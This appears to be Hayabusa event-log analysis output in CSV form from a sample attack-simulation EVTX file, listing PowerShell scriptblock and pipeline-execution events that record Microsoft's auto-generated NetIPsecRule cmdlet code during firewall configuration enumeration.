(@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${OutboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('OutboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('QuickModeCryptoSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${QuickModeCryptoSet}) $__cmdletization_queryBuilder.FilterByProperty('QuickModeCryptoSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase1AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase1AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase1AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase2AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase2AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase2AuthSet', $__cmdletization_values, $true, 'Default') } if 
($PSBoundParameters.ContainsKey('KeyModule') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${KeyModule}) $__cmdletization_queryBuilder.FilterByProperty('KeyModule', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowWatchKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowWatchKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowWatchKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowSetKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowSetKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowSetKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RemoteTunnelHostname') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RemoteTunnelHostname}) $__cmdletization_queryBuilder.FilterByProperty('RemoteTunnelEndpointDNSName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('ForwardPathLifetime') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${ForwardPathLifetime}) $__cmdletization_queryBuilder.FilterByProperty('MaxReturnPathLifetimeSeconds', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('EncryptedTunnelBypass') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${EncryptedTunnelBypass}) $__cmdletization_queryBuilder.FilterByProperty('BypassTunnelIfEncrypted', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RequireAuthorization') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RequireAuthorization}) $__cmdletization_queryBuilder.FilterByProperty('RequireAuthorization', $__cmdletization_values, $false, 'Default') } if 
($PSBoundParameters.ContainsKey('User') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${User}) $__cmdletization_queryBuilder.FilterByProperty('Users', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Machine') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Machine}) $__cmdletization_queryBuilder.FilterByProperty('Machines', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetConSecRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceFilter') 
-and (@('ByAssociatedNetFirewallInterfaceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceFilter}, 'MSFT_NetConSecRuleFilterByInterface', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceTypeFilter') -and (@('ByAssociatedNetFirewallInterfaceTypeFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceTypeFilter}, 'MSFT_NetConSecRuleFilterByInterfaceType', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallPortFilter') -and (@('ByAssociatedNetFirewallPortFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_que",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:05.754 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"ryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallPortFilter}, 'MSFT_NetConSecRuleFilterByProtocolPort', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetConSecRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase2AuthSet') -and (@('ByAssociatedNetIPsecPhase2AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase2AuthSet}, 'MSFT_NetConSecRuleEMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } 
if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase1AuthSet') -and (@('ByAssociatedNetIPsecPhase1AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase1AuthSet}, 'MSFT_NetConSecRuleMMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecQuickModeCryptoSet') -and (@('ByAssociatedNetIPsecQuickModeCryptoSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecQuickModeCryptoSet}, 'MSFT_NetConSecRuleQMCryptoSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and 
(@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Servers')) { [object]$__cmdletization_value = ${Servers} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Servers'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Servers'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) 
[object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Domains')) { [object]$__cmdletization_value = ${Domains} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Domains'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Domains'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('EndpointType')) { [object]$__cmdletization_value = ${EndpointType} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'EndpointType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EndpointType'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'EndpointType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EndpointType'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('AddressType')) { 
[object]$__cmdletization_value = ${AddressType} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'AddressType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.AddressVersion'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'AddressType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.AddressVersion'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Output'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'Out'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DnsServers')) { [object]$__cmdletization_value = ${DnsServers} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'DnsServers'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'DnsServers'; ParameterType = 
'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('SyncPolicyDelta', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $false if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Sync-NetIPsecRule' function Update-NetIPsecRule { [CmdletBinding(DefaultParameterSetName='Query (cdxml)', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance[]])] param( [Parameter(ParameterSetName='Query (cdxml)', Mandatory=$true, ValueFromPipelineByPropertyName=$true)] [Alias('ID','Name')] [ValidateNotNull()] [string[]] ${IPsecRuleName}, [Parameter(ParameterSetName='Query (cdxml)')] [string] ${PolicyStore}, [Parameter(ParameterSetName='Query (cdxml)')] [string] ${GPOSession}, 
[Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='Query (cdxml)', Mandatory=$true, ValueFromPipelineByPropertyName=$true)] [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipelineByPropertyName=$true)] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.ChangeAction] ${Action}, [Parameter(ParameterSetName='Query (cdxml)', ValueFromPipelineByPropertyName=$true)] [Parameter(ParameterSetName='InputObject (cdxml)', ValueFromPipelineByPropertyName=$true)] [string[]] ${IPv6Addresses}, [Parameter(ParameterSetName='Query (cdxml)', ValueFromPipelineByPropertyName=$true)] [Parameter(ParameterSetName='InputObject (cdxml)', ValueFromPipelineByPropertyName=$true)] [string[]] ${IPv4Addresses}, [Parameter(ParameterSetName='Query (cdxml)', Mandatory=$true, ValueFromPipelineByPropertyName=$true)] [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipelineByPropertyName=$true)] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EndpointType] ${EndpointType}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper 
$__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:05.754 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"(-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('IPsecRuleName') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${IPsecRuleName}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object 
System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('Query (cdxml)', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Action')) { [object]$__cmdletization_value = ${Action} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Action'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.ChangeAction'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Action'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.ChangeAction'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IPv6Addresses')) { [object]$__cmdletization_value = ${IPv6Addresses} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IPv6Addresses'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IPv6Addresses'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } 
$__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IPv4Addresses')) { [object]$__cmdletization_value = ${IPv4Addresses} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IPv4Addresses'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IPv4Addresses'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('EndpointType')) { [object]$__cmdletization_value = ${EndpointType} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'EndpointType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EndpointType'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'EndpointType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EndpointType'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null 
[object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PassThru')) { [object]$__cmdletization_value = ${PassThru} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'PassThru'; ParameterType = 'System.Management.Automation.SwitchParameter'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'PassThru'; ParameterType = 'System.Management.Automation.SwitchParameter'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Output'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'Out'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('SetPolicyDelta', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $false if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { 
$__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Update-NetIPsecRule'",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:05.770 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Get-Command): ""Get-Command"" ParameterBinding(Get-Command): name=""Module""; value=""Microsoft.PowerShell.Core"" ParameterBinding(Get-Command): name=""Name""; value=""Set-StrictMode""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:05.770 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:05.770 
+09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(New-Object): ""New-Object"" ParameterBinding(New-Object): name=""TypeName""; value=""System.Collections.Generic.Dictionary[string,string]""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:05.770 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:05.770 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""New-NetIPsecRule""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration 